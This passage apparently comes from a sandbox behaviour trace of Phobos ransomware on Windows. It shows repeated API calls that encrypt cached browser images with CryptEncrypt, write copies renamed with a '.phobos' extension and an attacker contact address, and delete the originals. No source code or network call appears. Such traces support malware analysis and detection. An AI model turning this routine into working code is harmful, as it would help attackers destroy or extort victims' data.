nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.655] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.655] CloseHandle (hObject=0x15c) returned 1 [0179.655] CloseHandle (hObject=0x17c) returned 1 [0179.655] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg")) returned 1 [0179.656] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.657] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=476) returned 1 [0179.657] CloseHandle (hObject=0x17c) returned 1 [0179.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png")) returned 0x2020 [0179.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.657] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.657] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.663] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.663] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.663] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1dc, lpOverlapped=0x0) returned 1 [0179.698] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1e0) returned 1 [0179.698] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1e0, lpOverlapped=0x0) returned 1 [0179.699] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.699] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.699] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.699] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.699] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.699] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.699] CloseHandle (hObject=0x17c) returned 1 [0179.699] CloseHandle (hObject=0x15c) returned 1 [0179.699] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png")) returned 1 [0179.700] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.701] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=431) returned 1 [0179.701] CloseHandle (hObject=0x15c) returned 1 [0179.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png")) returned 0x2020 [0179.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.701] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.701] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.701] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.702] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.702] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1af, lpOverlapped=0x0) returned 1 [0179.722] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1b0, dwBufLen=0x1b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1b0) returned 1 [0179.722] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1b0, lpOverlapped=0x0) returned 1 [0179.723] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.723] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.723] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.723] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.723] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.723] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.723] CloseHandle (hObject=0x15c) returned 1 [0179.723] CloseHandle (hObject=0x17c) returned 1 [0179.723] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png")) returned 1 [0179.724] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.724] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=571) returned 1 [0179.725] CloseHandle (hObject=0x17c) returned 1 [0179.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png")) returned 0x2020 [0179.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.725] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.725] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.725] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.725] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.725] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x23b, lpOverlapped=0x0) returned 1 [0179.762] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x240, dwBufLen=0x240 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x240) returned 1 [0179.762] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x240, lpOverlapped=0x0) returned 1 [0179.763] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.763] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.763] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.763] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.763] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.763] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.763] CloseHandle (hObject=0x17c) returned 1 [0179.763] CloseHandle (hObject=0x15c) returned 1 [0179.763] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png")) returned 1 [0179.764] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.765] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13174) returned 1 [0179.765] CloseHandle (hObject=0x15c) returned 1 [0179.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg")) returned 0x2020 [0179.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.765] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.765] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.766] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.766] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.766] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3376, lpOverlapped=0x0) returned 1 [0179.789] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3380, dwBufLen=0x3380 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3380) returned 1 [0179.789] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3380, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3380, lpOverlapped=0x0) returned 1 [0179.790] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.791] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.791] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.791] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.791] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.791] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.791] CloseHandle (hObject=0x15c) returned 1 [0179.791] CloseHandle (hObject=0x17c) returned 1 [0179.791] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg")) returned 1 [0179.792] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.793] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=80902) returned 1 [0179.793] CloseHandle (hObject=0x17c) returned 1 [0179.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg")) returned 0x2020 [0179.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.793] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.793] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" 